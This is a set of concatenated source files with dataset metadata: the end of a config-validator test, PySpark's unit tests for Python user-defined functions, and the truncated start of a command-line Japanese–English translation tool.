config_data['ingest_job']['ingest_type'] = 'volumetric'
config_data['client']['chunk_processor'] = {
"class":
"ingestclient.plugins.cloudvolume.CloudVolumeChunkProcessor",
"params": {
"cloudpath": "gs://neuroglancer/foo/bar"
}
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*chunk_size.*')
def test_no_tile_processor(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'tile'
config_data['ingest_job']['tile_size'] = {
'x': 2048,
'y': 1024,
'z': 32,
't': 1
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*tile_processor.*')
def test_no_tile_size(self):
schema_file = os.path.join(
resource_filename("ingestclient", "schema"),
"boss-v0.2-schema.json")
with open(schema_file, 'r') as file_handle:
schema = json.load(file_handle)
config_data = self.get_skeleton_config()
config_data['ingest_job']['ingest_type'] = 'tile'
config_data['client']['tile_processor'] = {
"class": "ingestclient.plugins.stack.ZindexStackTileProcessor",
"params": {}
}
config = Configuration(config_data)
validator = config.get_validator()
validator.schema = schema
msgs = validator.validate()
self.assertEqual(1, len(msgs['error']))
self.assertRegex(msgs['error'][0], '.*tile_size.*')
| 34.725888
| 103
| 0.573454
|
4a0a3760a556ca092ccbaf5d1be6b4be6e8f5e59
| 28,092
|
py
|
Python
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | 2
|
2017-08-04T11:37:01.000Z
|
2017-09-24T18:21:56.000Z
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | 2
|
2016-11-21T11:03:26.000Z
|
2018-08-23T04:33:23.000Z
|
python/pyspark/sql/tests/test_udf.py
|
zzy1120716/spark
|
ca711778683a16999560cbdd7c61d98ad6bde6db
|
[
"Apache-2.0"
] | null | null | null |
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import functools
import pydoc
import shutil
import tempfile
import unittest
from pyspark import SparkContext
from pyspark.sql import SparkSession, Column, Row
from pyspark.sql.functions import UserDefinedFunction, udf
from pyspark.sql.types import *
from pyspark.sql.utils import AnalysisException
from pyspark.testing.sqlutils import ReusedSQLTestCase, test_compiled, test_not_compiled_message
from pyspark.testing.utils import QuietTest
class UDFTests(ReusedSQLTestCase):
def test_udf_with_callable(self):
d = [Row(number=i, squared=i**2) for i in range(10)]
rdd = self.sc.parallelize(d)
data = self.spark.createDataFrame(rdd)
class PlusFour:
def __call__(self, col):
if col is not None:
return col + 4
call = PlusFour()
pudf = UserDefinedFunction(call, LongType())
res = data.select(pudf(data['number']).alias('plus_four'))
self.assertEqual(res.agg({'plus_four': 'sum'}).collect()[0][0], 85)
def test_udf_with_partial_function(self):
d = [Row(number=i, squared=i**2) for i in range(10)]
rdd = self.sc.parallelize(d)
data = self.spark.createDataFrame(rdd)
def some_func(col, param):
if col is not None:
return col + param
pfunc = functools.partial(some_func, param=4)
pudf = UserDefinedFunction(pfunc, LongType())
res = data.select(pudf(data['number']).alias('plus_four'))
self.assertEqual(res.agg({'plus_four': 'sum'}).collect()[0][0], 85)
    def test_udf(self):
        """Register a two-argument UDF via the catalog and call it from SQL."""
        self.spark.catalog.registerFunction("twoArgs", lambda x, y: len(x) + y, IntegerType())
        [row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
        self.assertEqual(row[0], 5)
        # This is to check if a deprecated 'SQLContext.registerFunction' can call its alias.
        sqlContext = self.spark._wrapped
        sqlContext.registerFunction("oneArg", lambda x: len(x), IntegerType())
        [row] = sqlContext.sql("SELECT oneArg('test')").collect()
        self.assertEqual(row[0], 4)
    def test_udf2(self):
        """A registered UDF is usable in both SELECT and WHERE clauses."""
        with self.tempView("test"):
            self.spark.catalog.registerFunction("strlen", lambda string: len(string), IntegerType())
            self.spark.createDataFrame(self.sc.parallelize([Row(a="test")]))\
                .createOrReplaceTempView("test")
            [res] = self.spark.sql("SELECT strlen(a) FROM test WHERE strlen(a) > 1").collect()
            self.assertEqual(4, res[0])
    def test_udf3(self):
        """With no explicit returnType, the UDF output defaults to string."""
        two_args = self.spark.catalog.registerFunction(
            "twoArgs", UserDefinedFunction(lambda x, y: len(x) + y))
        self.assertEqual(two_args.deterministic, True)
        [row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
        # Default return type is string, so the integer 5 comes back as u'5'.
        self.assertEqual(row[0], u'5')
    def test_udf_registration_return_type_none(self):
        """returnType=None is accepted when the UDF already carries a type."""
        two_args = self.spark.catalog.registerFunction(
            "twoArgs", UserDefinedFunction(lambda x, y: len(x) + y, "integer"), None)
        self.assertEqual(two_args.deterministic, True)
        [row] = self.spark.sql("SELECT twoArgs('test', 1)").collect()
        self.assertEqual(row[0], 5)
    def test_udf_registration_return_type_not_none(self):
        """Passing a returnType alongside an already-typed UDF raises TypeError."""
        with QuietTest(self.sc):
            with self.assertRaisesRegexp(TypeError, "Invalid returnType"):
                self.spark.catalog.registerFunction(
                    "f", UserDefinedFunction(lambda x, y: len(x) + y, StringType()), StringType())
    def test_nondeterministic_udf(self):
        """A nondeterministic UDF is evaluated once per row, not per reference."""
        # Test that nondeterministic UDFs are evaluated only once in chained UDF evaluations
        import random
        udf_random_col = udf(lambda: int(100 * random.random()), IntegerType()).asNondeterministic()
        self.assertEqual(udf_random_col.deterministic, False)
        df = self.spark.createDataFrame([Row(1)]).select(udf_random_col().alias('RAND'))
        udf_add_ten = udf(lambda rand: rand + 10, IntegerType())
        [row] = df.withColumn('RAND_PLUS_TEN', udf_add_ten('RAND')).collect()
        # If RAND were re-evaluated for the second column, the equality would fail.
        self.assertEqual(row[0] + 10, row[1])
    def test_nondeterministic_udf2(self):
        """Nondeterminism survives catalog registration, and help() works on UDFs."""
        import random
        # randint(6, 6) always returns 6, making the result assertable.
        random_udf = udf(lambda: random.randint(6, 6), IntegerType()).asNondeterministic()
        self.assertEqual(random_udf.deterministic, False)
        random_udf1 = self.spark.catalog.registerFunction("randInt", random_udf)
        self.assertEqual(random_udf1.deterministic, False)
        [row] = self.spark.sql("SELECT randInt()").collect()
        self.assertEqual(row[0], 6)
        [row] = self.spark.range(1).select(random_udf1()).collect()
        self.assertEqual(row[0], 6)
        [row] = self.spark.range(1).select(random_udf()).collect()
        self.assertEqual(row[0], 6)
        # render_doc() reproduces the help() exception without printing output
        pydoc.render_doc(udf(lambda: random.randint(6, 6), IntegerType()))
        pydoc.render_doc(random_udf)
        pydoc.render_doc(random_udf1)
        pydoc.render_doc(udf(lambda x: x).asNondeterministic)
    def test_nondeterministic_udf3(self):
        """asNondeterministic() must reset the cached JVM UDF instance."""
        # regression test for SPARK-23233
        f = udf(lambda x: x)
        # Here we cache the JVM UDF instance.
        self.spark.range(1).select(f("id"))
        # This should reset the cache to set the deterministic status correctly.
        f = f.asNondeterministic()
        # Check the deterministic status of udf.
        df = self.spark.range(1).select(f("id"))
        deterministic = df._jdf.logicalPlan().projectList().head().deterministic()
        self.assertFalse(deterministic)
    def test_nondeterministic_udf_in_aggregate(self):
        """Using a nondeterministic UDF in an aggregate raises AnalysisException."""
        from pyspark.sql.functions import sum
        import random
        udf_random_col = udf(lambda: int(100 * random.random()), 'int').asNondeterministic()
        df = self.spark.range(10)
        with QuietTest(self.sc):
            with self.assertRaisesRegexp(AnalysisException, "nondeterministic"):
                df.groupby('id').agg(sum(udf_random_col())).collect()
            with self.assertRaisesRegexp(AnalysisException, "nondeterministic"):
                df.agg(sum(udf_random_col())).collect()
def test_chained_udf(self):
    # A registered UDF can be nested inside itself and combined with other
    # expressions in SQL.
    self.spark.catalog.registerFunction("double", lambda x: x + x, IntegerType())
    [row] = self.spark.sql("SELECT double(1)").collect()
    self.assertEqual(row[0], 2)
    [row] = self.spark.sql("SELECT double(double(1))").collect()
    self.assertEqual(row[0], 4)
    [row] = self.spark.sql("SELECT double(double(1) + 1)").collect()
    self.assertEqual(row[0], 6)
def test_single_udf_with_repeated_argument(self):
    # regression test for SPARK-20685: passing the same literal twice to one
    # UDF must bind both parameters.
    self.spark.catalog.registerFunction("add", lambda x, y: x + y, IntegerType())
    row = self.spark.sql("SELECT add(1, 1)").first()
    self.assertEqual(tuple(row), (2, ))
def test_multiple_udfs(self):
    # Several UDFs can appear in one projection, nested and mixed with
    # ordinary expressions.
    self.spark.catalog.registerFunction("double", lambda x: x * 2, IntegerType())
    [row] = self.spark.sql("SELECT double(1), double(2)").collect()
    self.assertEqual(tuple(row), (2, 4))
    [row] = self.spark.sql("SELECT double(double(1)), double(double(2) + 2)").collect()
    self.assertEqual(tuple(row), (4, 12))
    self.spark.catalog.registerFunction("add", lambda x, y: x + y, IntegerType())
    [row] = self.spark.sql("SELECT double(add(1, 2)), add(double(2), 1)").collect()
    self.assertEqual(tuple(row), (6, 5))
def test_udf_in_filter_on_top_of_outer_join(self):
    # A UDF-derived column added after a left outer join must be usable in a
    # subsequent filter().
    left = self.spark.createDataFrame([Row(a=1)])
    right = self.spark.createDataFrame([Row(a=1)])
    df = left.join(right, on='a', how='left_outer')
    df = df.withColumn('b', udf(lambda x: 'x')(df.a))
    self.assertEqual(df.filter('b = "x"').collect(), [Row(a=1, b='x')])
def test_udf_in_filter_on_top_of_join(self):
    # regression test for SPARK-18589: a boolean UDF referencing columns from
    # both sides of a cross join works as a filter.
    left = self.spark.createDataFrame([Row(a=1)])
    right = self.spark.createDataFrame([Row(b=1)])
    f = udf(lambda a, b: a == b, BooleanType())
    df = left.crossJoin(right).filter(f("a", "b"))
    self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_in_join_condition(self):
    # regression test for SPARK-25314
    left = self.spark.createDataFrame([Row(a=1)])
    right = self.spark.createDataFrame([Row(b=1)])
    f = udf(lambda a, b: a == b, BooleanType())
    # The udf uses attributes from both sides of join, so it is pulled out as Filter +
    # Cross join.
    df = left.join(right, f("a", "b"))
    # With cross joins disabled the implicit cartesian product is rejected...
    with self.sql_conf({"spark.sql.crossJoin.enabled": False}):
        with self.assertRaisesRegexp(AnalysisException, 'Detected implicit cartesian product'):
            df.collect()
    # ...and with them enabled the UDF condition evaluates correctly.
    with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
        self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_in_left_outer_join_condition(self):
    # regression test for SPARK-26147
    from pyspark.sql.functions import col
    left = self.spark.createDataFrame([Row(a=1)])
    right = self.spark.createDataFrame([Row(b=1)])
    f = udf(lambda a: str(a), StringType())
    # The join condition can't be pushed down, as it refers to attributes from both sides.
    # The Python UDF only refer to attributes from one side, so it's evaluable.
    df = left.join(right, f("a") == col("b").cast("string"), how="left_outer")
    with self.sql_conf({"spark.sql.crossJoin.enabled": True}):
        self.assertEqual(df.collect(), [Row(a=1, b=1)])
def test_udf_and_common_filter_in_join_condition(self):
    # regression test for SPARK-25314
    # test the complex scenario with both udf and common filter
    left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
    right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
    f = udf(lambda a, b: a == b, BooleanType())
    df = left.join(right, [f("a", "b"), left.a1 == right.b1])
    # do not need spark.sql.crossJoin.enabled=true for udf is not the only join condition.
    self.assertEqual(df.collect(), [Row(a=1, a1=1, a2=1, b=1, b1=1, b2=1)])
def test_udf_not_supported_in_join_condition(self):
    # regression test for SPARK-25314
    # test python udf is not supported in join type except inner join.
    left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
    right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
    f = udf(lambda a, b: a == b, BooleanType())

    def runWithJoinType(join_type, type_string):
        # Each non-inner join type must fail analysis with a message naming it.
        with self.assertRaisesRegexp(
                AnalysisException,
                'Using PythonUDF.*%s is not supported.' % type_string):
            left.join(right, [f("a", "b"), left.a1 == right.b1], join_type).collect()
    runWithJoinType("full", "FullOuter")
    runWithJoinType("left", "LeftOuter")
    runWithJoinType("right", "RightOuter")
    runWithJoinType("leftanti", "LeftAnti")
    runWithJoinType("leftsemi", "LeftSemi")
def test_udf_as_join_condition(self):
    # An equality between two UDF results is a valid (inner) join condition.
    left = self.spark.createDataFrame([Row(a=1, a1=1, a2=1), Row(a=2, a1=2, a2=2)])
    right = self.spark.createDataFrame([Row(b=1, b1=1, b2=1), Row(b=1, b1=3, b2=1)])
    f = udf(lambda a: a, IntegerType())
    df = left.join(right, [f("a") == f("b"), left.a1 == right.b1])
    self.assertEqual(df.collect(), [Row(a=1, a1=1, a2=1, b=1, b1=1, b2=1)])
def test_udf_without_arguments(self):
    # A zero-argument UDF is callable from SQL.
    self.spark.catalog.registerFunction("foo", lambda: "bar")
    [row] = self.spark.sql("SELECT foo()").collect()
    self.assertEqual(row[0], "bar")
def test_udf_with_array_type(self):
    # UDFs can return array values and accept map-typed arguments.
    with self.tempView("test"):
        d = [Row(l=list(range(3)), d={"key": list(range(5))})]
        rdd = self.sc.parallelize(d)
        self.spark.createDataFrame(rdd).createOrReplaceTempView("test")
        self.spark.catalog.registerFunction(
            "copylist", lambda l: list(l), ArrayType(IntegerType()))
        self.spark.catalog.registerFunction("maplen", lambda d: len(d), IntegerType())
        [(l1, l2)] = self.spark.sql("select copylist(l), maplen(d) from test").collect()
        self.assertEqual(list(range(3)), l1)
        self.assertEqual(1, l2)
def test_broadcast_in_udf(self):
    # A UDF must be able to read a broadcast variable's value.
    bar = {"a": "aa", "b": "bb", "c": "abc"}
    foo = self.sc.broadcast(bar)
    self.spark.catalog.registerFunction("MYUDF", lambda x: foo.value[x] if x else '')
    [res] = self.spark.sql("SELECT MYUDF('c')").collect()
    self.assertEqual("abc", res[0])
    [res] = self.spark.sql("SELECT MYUDF('')").collect()
    self.assertEqual("", res[0])
def test_udf_with_filter_function(self):
    # A boolean UDF can be AND-ed with a plain column predicate in filter().
    df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
    from pyspark.sql.functions import col
    from pyspark.sql.types import BooleanType

    my_filter = udf(lambda a: a < 2, BooleanType())
    sel = df.select(col("key"), col("value")).filter((my_filter(col("key"))) & (df.value < "2"))
    self.assertEqual(sel.collect(), [Row(key=1, value='1')])
def test_udf_with_aggregate_function(self):
    # UDFs work in filters over distinct results and in grouping keys,
    # aggregate inputs and post-aggregation projections.
    df = self.spark.createDataFrame([(1, "1"), (2, "2"), (1, "2"), (1, "2")], ["key", "value"])
    from pyspark.sql.functions import col, sum
    from pyspark.sql.types import BooleanType

    my_filter = udf(lambda a: a == 1, BooleanType())
    sel = df.select(col("key")).distinct().filter(my_filter(col("key")))
    self.assertEqual(sel.collect(), [Row(key=1)])

    my_copy = udf(lambda x: x, IntegerType())
    my_add = udf(lambda a, b: int(a + b), IntegerType())
    my_strlen = udf(lambda x: len(x), IntegerType())
    sel = df.groupBy(my_copy(col("key")).alias("k"))\
        .agg(sum(my_strlen(col("value"))).alias("s"))\
        .select(my_add(col("k"), col("s")).alias("t"))
    self.assertEqual(sel.collect(), [Row(t=4), Row(t=3)])
def test_udf_in_generate(self):
    # Array-returning UDFs can feed explode() (a generator expression).
    from pyspark.sql.functions import explode
    df = self.spark.range(5)
    f = udf(lambda x: list(range(x)), ArrayType(LongType()))
    row = df.select(explode(f(*df))).groupBy().sum().first()
    self.assertEqual(row[0], 10)

    df = self.spark.range(3)
    res = df.select("id", explode(f(df.id))).collect()
    self.assertEqual(res[0][0], 1)
    self.assertEqual(res[0][1], 0)
    self.assertEqual(res[1][0], 2)
    self.assertEqual(res[1][1], 0)
    self.assertEqual(res[2][0], 2)
    self.assertEqual(res[2][1], 1)

    range_udf = udf(lambda value: list(range(value - 1, value + 1)), ArrayType(IntegerType()))
    res = df.select("id", explode(range_udf(df.id))).collect()
    self.assertEqual(res[0][0], 0)
    self.assertEqual(res[0][1], -1)
    self.assertEqual(res[1][0], 0)
    self.assertEqual(res[1][1], 0)
    self.assertEqual(res[2][0], 1)
    self.assertEqual(res[2][1], 0)
    self.assertEqual(res[3][0], 1)
    self.assertEqual(res[3][1], 1)
def test_udf_with_order_by_and_limit(self):
    # A UDF projection composes with orderBy + limit.
    my_copy = udf(lambda x: x, IntegerType())
    df = self.spark.range(10).orderBy("id")
    res = df.select(df.id, my_copy(df.id).alias("copy")).limit(1)
    self.assertEqual(res.collect(), [Row(id=0, copy=0)])
def test_udf_registration_returns_udf(self):
    # register() must return a callable UDF equivalent to the SQL-registered one.
    df = self.spark.range(10)
    add_three = self.spark.udf.register("add_three", lambda x: x + 3, IntegerType())
    self.assertListEqual(
        df.selectExpr("add_three(id) AS plus_three").collect(),
        df.select(add_three("id").alias("plus_three")).collect()
    )

    # This is to check if a 'SQLContext.udf' can call its alias.
    sqlContext = self.spark._wrapped
    add_four = sqlContext.udf.register("add_four", lambda x: x + 4, IntegerType())
    self.assertListEqual(
        df.selectExpr("add_four(id) AS plus_four").collect(),
        df.select(add_four("id").alias("plus_four")).collect()
    )
def test_non_existed_udf(self):
    # Registering a Java UDF whose class is missing raises AnalysisException.
    spark = self.spark
    self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udf",
                            lambda: spark.udf.registerJavaFunction("udf1", "non_existed_udf"))

    # This is to check if a deprecated 'SQLContext.registerJavaFunction' can call its alias.
    sqlContext = spark._wrapped
    self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udf",
                            lambda: sqlContext.registerJavaFunction("udf1", "non_existed_udf"))
def test_non_existed_udaf(self):
    # Registering a Java UDAF whose class is missing raises AnalysisException.
    spark = self.spark
    self.assertRaisesRegexp(AnalysisException, "Can not load class non_existed_udaf",
                            lambda: spark.udf.registerJavaUDAF("udaf1", "non_existed_udaf"))
def test_udf_with_input_file_name(self):
    # input_file_name() must be visible to a UDF reading from a file source.
    from pyspark.sql.functions import input_file_name
    sourceFile = udf(lambda path: path, StringType())
    filePath = "python/test_support/sql/people1.json"
    row = self.spark.read.json(filePath).select(sourceFile(input_file_name())).first()
    self.assertTrue(row[0].find("people1.json") != -1)
def test_udf_with_input_file_name_for_hadooprdd(self):
    # input_file_name() must also be populated for RDD-backed DataFrames
    # created via textFile and newAPIHadoopFile.
    from pyspark.sql.functions import input_file_name

    def filename(path):
        return path

    sameText = udf(filename, StringType())

    rdd = self.sc.textFile('python/test_support/sql/people.json')
    df = self.spark.read.json(rdd).select(input_file_name().alias('file'))
    row = df.select(sameText(df['file'])).first()
    self.assertTrue(row[0].find("people.json") != -1)

    rdd2 = self.sc.newAPIHadoopFile(
        'python/test_support/sql/people.json',
        'org.apache.hadoop.mapreduce.lib.input.TextInputFormat',
        'org.apache.hadoop.io.LongWritable',
        'org.apache.hadoop.io.Text')
    df2 = self.spark.read.json(rdd2).select(input_file_name().alias('file'))
    row2 = df2.select(sameText(df2['file'])).first()
    self.assertTrue(row2[0].find("people.json") != -1)
def test_udf_defers_judf_initialization(self):
    # This is separate of UDFInitializationTests
    # to avoid context initialization
    # when udf is called
    f = UserDefinedFunction(lambda x: x, StringType())

    # The JVM-side UDF must be created lazily, on first call only.
    self.assertIsNone(
        f._judf_placeholder,
        "judf should not be initialized before the first call."
    )
    self.assertIsInstance(f("foo"), Column, "UDF call should return a Column.")
    self.assertIsNotNone(
        f._judf_placeholder,
        "judf should be initialized after UDF has been called."
    )
def test_udf_with_string_return_type(self):
    # DDL strings ("integer", "struct<...>", "array<double>") are accepted as
    # return types in place of DataType objects.
    add_one = UserDefinedFunction(lambda x: x + 1, "integer")
    make_pair = UserDefinedFunction(lambda x: (-x, x), "struct<x:integer,y:integer>")
    make_array = UserDefinedFunction(
        lambda x: [float(x) for x in range(x, x + 3)], "array<double>")

    expected = (2, Row(x=-1, y=1), [1.0, 2.0, 3.0])
    actual = (self.spark.range(1, 2).toDF("x")
              .select(add_one("x"), make_pair("x"), make_array("x"))
              .first())
    self.assertTupleEqual(expected, actual)
def test_udf_shouldnt_accept_noncallable_object(self):
    # Passing a non-callable to UserDefinedFunction raises TypeError.
    non_callable = None
    self.assertRaises(TypeError, UserDefinedFunction, non_callable, StringType())
def test_udf_with_decorator(self):
    # Exercises every supported @udf decorator spelling: bare @udf, @udf(),
    # positional DataType, keyword returnType, and DDL strings.
    from pyspark.sql.functions import lit
    from pyspark.sql.types import IntegerType, DoubleType

    @udf(IntegerType())
    def add_one(x):
        if x is not None:
            return x + 1

    @udf(returnType=DoubleType())
    def add_two(x):
        if x is not None:
            return float(x + 2)

    @udf
    def to_upper(x):
        if x is not None:
            return x.upper()

    @udf()
    def to_lower(x):
        if x is not None:
            return x.lower()

    @udf
    def substr(x, start, end):
        if x is not None:
            return x[start:end]

    @udf("long")
    def trunc(x):
        return int(x)

    @udf(returnType="double")
    def as_double(x):
        return float(x)

    df = (
        self.spark
        .createDataFrame(
            [(1, "Foo", "foobar", 3.0)], ("one", "Foo", "foobar", "float"))
        .select(
            add_one("one"), add_two("one"),
            to_upper("Foo"), to_lower("Foo"),
            substr("foobar", lit(0), lit(3)),
            trunc("float"), as_double("one")))

    # Both the declared result types and the computed values must match.
    self.assertListEqual(
        [tpe for _, tpe in df.dtypes],
        ["int", "double", "string", "string", "string", "bigint", "double"]
    )
    self.assertListEqual(
        list(df.first()),
        [2, 3.0, "FOO", "foo", "foo", 3, 1.0]
    )
def test_udf_wrapper(self):
    # udf() must preserve the wrapped callable's docstring, expose the
    # original callable as .func, and keep the declared returnType — for
    # plain functions, callable objects and functools.partial objects.
    from pyspark.sql.types import IntegerType

    def f(x):
        """Identity"""
        return x

    return_type = IntegerType()
    f_ = udf(f, return_type)
    self.assertTrue(f.__doc__ in f_.__doc__)
    self.assertEqual(f, f_.func)
    self.assertEqual(return_type, f_.returnType)

    class F(object):
        """Identity"""
        def __call__(self, x):
            return x

    f = F()
    return_type = IntegerType()
    f_ = udf(f, return_type)
    self.assertTrue(f.__doc__ in f_.__doc__)
    self.assertEqual(f, f_.func)
    self.assertEqual(return_type, f_.returnType)

    f = functools.partial(f, x=1)
    return_type = IntegerType()
    f_ = udf(f, return_type)
    self.assertTrue(f.__doc__ in f_.__doc__)
    self.assertEqual(f, f_.func)
    self.assertEqual(return_type, f_.returnType)
def test_nonparam_udf_with_aggregate(self):
    # A zero-argument UDF works on top of a distinct() aggregation.
    import pyspark.sql.functions as f

    df = self.spark.createDataFrame([(1, 2), (1, 2)])
    f_udf = f.udf(lambda: "const_str")
    rows = df.distinct().withColumn("a", f_udf()).collect()
    self.assertEqual(rows, [Row(_1=1, _2=2, a=u'const_str')])
# SPARK-24721
@unittest.skipIf(not test_compiled, test_not_compiled_message)
def test_datasource_with_udf(self):
    # Python UDFs in projections and filters must behave identically on file
    # sources, DataSource V1 relations and DataSource V2 relations.
    from pyspark.sql.functions import lit, col

    path = tempfile.mkdtemp()
    # Remove the directory so only its unique name is reused as the save path.
    shutil.rmtree(path)

    try:
        self.spark.range(1).write.mode("overwrite").format('csv').save(path)
        filesource_df = self.spark.read.option('inferSchema', True).csv(path).toDF('i')
        datasource_df = self.spark.read \
            .format("org.apache.spark.sql.sources.SimpleScanSource") \
            .option('from', 0).option('to', 1).load().toDF('i')
        datasource_v2_df = self.spark.read \
            .format("org.apache.spark.sql.sources.v2.SimpleDataSourceV2") \
            .load().toDF('i', 'j')

        c1 = udf(lambda x: x + 1, 'int')(lit(1))
        c2 = udf(lambda x: x + 1, 'int')(col('i'))

        f1 = udf(lambda x: False, 'boolean')(lit(1))
        f2 = udf(lambda x: False, 'boolean')(col('i'))

        for df in [filesource_df, datasource_df, datasource_v2_df]:
            result = df.withColumn('c', c1)
            expected = df.withColumn('c', lit(2))
            self.assertEquals(expected.collect(), result.collect())

        for df in [filesource_df, datasource_df, datasource_v2_df]:
            result = df.withColumn('c', c2)
            expected = df.withColumn('c', col('i') + 1)
            self.assertEquals(expected.collect(), result.collect())

        # An always-false UDF filter must drop every row for every source.
        for df in [filesource_df, datasource_df, datasource_v2_df]:
            for f in [f1, f2]:
                result = df.filter(f)
                self.assertEquals(0, result.count())
    finally:
        shutil.rmtree(path)
# SPARK-25591
def test_same_accumulator_in_udfs(self):
    # Two UDFs sharing the same accumulator must each update it exactly once
    # per row (total 1 + 100 for the single input row).
    data_schema = StructType([StructField("a", IntegerType(), True),
                              StructField("b", IntegerType(), True)])
    data = self.spark.createDataFrame([[1, 2]], schema=data_schema)

    test_accum = self.sc.accumulator(0)

    def first_udf(x):
        test_accum.add(1)
        return x

    def second_udf(x):
        test_accum.add(100)
        return x

    func_udf = udf(first_udf, IntegerType())
    func_udf2 = udf(second_udf, IntegerType())
    data = data.withColumn("out1", func_udf(data["a"]))
    data = data.withColumn("out2", func_udf2(data["b"]))
    data.collect()
    self.assertEqual(test_accum.value, 101)
# SPARK-26293
def test_udf_in_subquery(self):
    # A temp view built with a Python UDF filter must be usable from an IN
    # subquery.
    f = udf(lambda x: x, "long")
    with self.tempView("v"):
        self.spark.range(1).filter(f("id") >= 0).createTempView("v")
        sql = self.spark.sql
        result = sql("select i from values(0L) as data(i) where i in (select id from v)")
        self.assertEqual(result.collect(), [Row(i=0)])
def test_udf_globals_not_overwritten(self):
    # The worker must not replace globals such as the builtin `map` with an
    # itertools-based variant when deserializing the UDF.
    @udf('string')
    def f():
        assert "itertools" not in str(map)

    self.spark.range(1).select(f()).collect()
def test_worker_original_stdin_closed(self):
    # Test if it closes the original standard input of worker inherited from the daemon,
    # and replaces it with '/dev/null'.  See SPARK-26175.
    def task(iterator):
        import sys
        res = sys.stdin.read()
        # Because the standard input is '/dev/null', it reaches to EOF.
        assert res == '', "Expect read EOF from stdin."
        return iterator

    self.sc.parallelize(range(1), 1).mapPartitions(task).count()
class UDFInitializationTests(unittest.TestCase):
    """Tests that must run without a pre-existing SparkContext/SparkSession."""

    def tearDown(self):
        # Stop anything a test accidentally created so later tests start clean.
        if SparkSession._instantiatedSession is not None:
            SparkSession._instantiatedSession.stop()

        if SparkContext._active_spark_context is not None:
            SparkContext._active_spark_context.stop()

    def test_udf_init_shouldnt_initialize_context(self):
        # Constructing a UserDefinedFunction must be lazy: neither a
        # SparkContext nor a SparkSession may be created as a side effect.
        UserDefinedFunction(lambda x: x, StringType())

        self.assertIsNone(
            SparkContext._active_spark_context,
            "SparkContext shouldn't be initialized when UserDefinedFunction is created."
        )
        self.assertIsNone(
            SparkSession._instantiatedSession,
            "SparkSession shouldn't be initialized when UserDefinedFunction is created."
        )
if __name__ == "__main__":
from pyspark.sql.tests.test_udf import *
try:
import xmlrunner
testRunner = xmlrunner.XMLTestRunner(output='target/test-reports', verbosity=2)
except ImportError:
testRunner = None
unittest.main(testRunner=testRunner, verbosity=2)
| 42.371041
| 100
| 0.609391
|
4a0a39061f9cc7e1555c400e973f3f7325573b32
| 3,473
|
py
|
Python
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 7
|
2018-01-31T18:00:09.000Z
|
2018-08-21T01:49:44.000Z
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 1
|
2018-03-07T23:56:29.000Z
|
2018-03-07T23:56:29.000Z
|
cmd.py
|
togatoga/vn
|
1266b40a1986bb28e72a6cc06bf45d61cd44b5db
|
[
"MIT"
] | 1
|
2021-01-26T19:12:44.000Z
|
2021-01-26T19:12:44.000Z
|
#!/usr/bin/env python
import click
import crayons
from prompt_toolkit import prompt
from bs4 import BeautifulSoup
from vn.util import is_japanese,get_synonyms
from vn.glosbe import Glosbe
@click.group()
def cmd():
    """Root click command group for the vn CLI."""
    pass
@cmd.command(help="translate [phrase]")
@click.argument('phrase', required=False)
@click.option("--interactive", "-i", is_flag=True, help='interactive mode')
@click.option("--from", "-f", 'frm', default="jpn", help='language of phrase to translate, values: ISO 693-3 three letter language code')
@click.option("--dest", "-d", 'dst', default="eng", help='destination language, values: ISO 693-3 three letter language code')
@click.option("--limit", "-l", "limit", default=10, help='output limit')
def translate(interactive, phrase, frm, dst, limit):
if interactive:
click.echo(':q quit')
while (True):
phrase = prompt("[vn] > ")
if is_japanese(phrase):
frm = 'jpn'
dst = 'eng'
else:
frm = 'eng'
dst = 'jpn'
if phrase == ':q':
break
if phrase == '' or phrase == None:
click.echo('empty phrase')
continue
result = _translate(phrase, frm, dst)
translations = result.get_translations()
synonyms = get_synonyms(phrase)
examples = result.get_examples()
print_translations(translations, limit)
print_synonyms(synonyms)
print_examples(examples, frm, dst)
else:
if phrase == '' or phrase == None:
click.echo('empty phrase')
exit(1)
if is_japanese(phrase):
frm = 'jpn'
dst = 'eng'
else:
frm = 'eng'
dst = 'jpn'
result = _translate(phrase, frm, dst)
synonyms = get_synonyms(phrase)
translations = result.get_translations()
examples = result.get_examples()
